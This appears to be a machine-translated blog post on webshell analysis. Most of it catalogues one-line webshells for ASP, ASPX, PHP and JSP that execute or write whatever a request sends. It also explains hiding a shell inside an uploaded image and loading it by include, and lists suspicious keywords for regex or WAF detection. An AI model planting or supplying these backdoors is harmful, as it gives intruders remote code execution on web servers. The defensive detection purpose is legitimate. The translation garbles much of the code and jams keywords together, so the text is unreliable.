Webshell analysis (webpage Trojan)

Principle: "one-sentence Trojan" is used to control data submitted to the receiving client. The submitted data is parsed and executed by the server, and can be submitted to the specified file, you can also submit statements such as database query.

 

Webshell Analysis in one sentence:

 

[] Is their keyword in the middle. The submitted parameter is 0x001.

 

ASP: <% execute request ("0x001") %> [execute]

 

<% Eval request ("0x001") %> [eval]

 

<% Eval_r (Request ("0x001") %> [eval_r]

 

<% Executeglobal request ("0x001") %> [executeglobal]

 

<% @ Language = "JavaScript" codePage = "65001" %> <% var OBJ = {'name': request. form ('0x001'), 'sex': eval}; obj. name (obj. sex) + ''); %> [eval]

 

<% Set O = server. createobject ("scriptcontrol"): O. language = "VBScript": O. addcode (Request ("subcode"): O. run "0x001", server, response, request, application, session, error %> [scriptcontrol]

 

Hide: write a sentence in an image and upload it to the images directory of the website. <% On error resume next: If request ("0x001") <> "" Then: Session ("webshell") = request ("0x001 "): end if: If SESSION ("webshell") <> "" Then: response. clear: Execute (Session ("webshell"): Response. end: end if %> change one of ASP, plus: <! -- # Include file = "images/webshell.jpg" --> when accessing this ASP page, if the input parameter is 0x001, the execution can be triggered.

 

Aspx: <% @ page Language = "jscript" %> <% eval (request. item ["0x001"], "unsafe"); %> [eval]

 

<% @ Page Language = "jscript" %> <% eval_r (request. item ["0x001"], "unsafe"); %>

[Eval_r]

 

<% @ Page Language = "C #" %> <% IF (request. Files. Count! = 0) {request. Files [0]. saveas (server. mappath (request ["0x001"]);} %>

[This keyword is hard to say]

 

<% @ Page Language = "C #" validaterequest = "false" %> <% Try {system. reflection. assembly. load (request. binaryread (Int. parse (request. cookies ["0x001"]. value ))). createinstance ("C", true, system. reflection. bindingflags. default, null, new object [] {This}, null, null);} catch {}%> [system. reflection. assembly. load] // use reflection in aspx, of course not normal.

 

PHP: <? PHP @ eval ($ _ post ['0x001']);?> [Eval]

 

<? PHP @ eval_r ($ _ post ['0x001']);?> [Eval_r]

 

<? PHP assert ($ _ post ['0x001']);?> [Assert]

 

<? PHP echo '$ _ request [ID]';?> ['']

 

PHP can also be used <? PHP Include ('images/webshell.jpg ');?> To load Image Code

 

JSP: <% IF (request. getparameter ("F ")! = NULL) (new Java. io. fileoutputstream (application. getrealpath ("\") + request. getparameter ("F "))). write (request. getparameter ("T "). getbytes (); %> [Java. io. fileoutputstream]

 

Of course, there are also many variants or other executable functions. The functions of large Web Trojans are much more powerful, and there are also many dangerous keywords. These keywords may not necessarily be webpage Trojans, but if we want to analyze it, this is a possibility. : Wscript. shellclsid: 72c24dd5-d70a-438b-8a42-98108b88afb8shell.applicationclsid: 13709620-c279-11ce-a49e-4445535420.vbscript.encode // used to encrypt ASP code. executestatementshell_execxp_unzip shellscripting.filesystemobjectclsid: 0d43fe01-f093-11cf-8940-00a0c9054228adodb.streamclsid: Export csystem. net. socketssystem. diagnosticssystem. directoryservicessystem. serviceprocessimport = "Java. util. *, Java. io. *"

 

Therefore, regular expressions are the most convenient way to analyze the above Code during testing. Do you have any good detection methods. Do not paste it to learn from each other.

 

Sov. WAF detects the preceding code to complete webshell analysis, but it also reports false positives, because some normal Web pages also use keywords such as execute.